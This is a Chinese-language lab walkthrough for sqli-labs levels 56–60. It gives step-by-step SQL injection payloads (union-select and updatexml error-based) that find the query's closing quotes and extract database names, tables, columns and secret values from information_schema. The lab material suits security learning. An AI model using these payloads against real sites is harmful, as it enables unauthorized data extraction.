less-56
1.判断注入点
?id=1' 页面不正常
2.判断闭合方式
?id=1') --+ 可以闭合成功
3.查看页面回显点
?id=-1')%20 union select 1,2,3--+
4.查询数据库名
?id=-1')%20 union select 1,database(),3--+
5.查询所有表
?id=-1')%20 union select 1,(select table_name from information_schema.tables where table_schema='challenges'),3--+
6.查询表的所有字段
?id=-1')%20 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='43kcrdhm86'),3--+
7.查询payload
?id=-1')%20 union select 1,(select group_concat(secret_N2VJ) from 43kcrdhm86),3--+
提交即可
less-57
这一关同上一关一样 只是闭合方式不同 这一关的闭合方式是双引号闭合
less-58
1.判断闭合方式
单引号可以闭合成功
2.查询数据库名
使用报错注入查询
?id=1' and updatexml(1,concat(1,database()),1)--+
3.查询所有表
?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+
4.查询表的所有字段
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oku1ceqf6n')),1)--+
5.查询payload
?id=1' and updatexml(1,concat(1,(select group_concat(secret_M0T5) from oku1ceqf6n)),1)--+
提交即可
less-59
这一关同上一关一样使用报错注入 不同的是这一关是数字型注入 闭合方式为整数型
less-60
1.判断闭合方式
?id=1") --+ 闭合方式为双引号加括号
2.查询数据库的所有表
因为题目中以及给了数据库 所有直接查表即可
?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+
3.查询表的所有字段
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='cxnzzdty'),0x7e),1)--+
4.查询payload
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_MB6W) from cxnzzdty),0x7e),1)--+’